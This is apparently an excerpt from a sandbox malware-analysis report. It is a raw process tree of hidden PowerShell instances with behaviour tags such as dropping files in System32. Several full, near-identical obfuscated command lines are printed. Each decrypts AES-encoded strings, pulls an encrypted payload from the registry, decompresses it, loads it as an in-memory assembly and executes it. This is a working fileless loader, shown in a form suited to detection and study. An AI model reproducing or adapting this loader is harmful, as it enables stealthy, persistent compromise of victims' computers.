'')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        16⤵
        Checks computer location settings
        Drops file in System32 directory
        Suspicious use of SetWindowsHookEx
        
        PID:6028
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:6576
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        17⤵
        
        PID:2844
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(6028).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 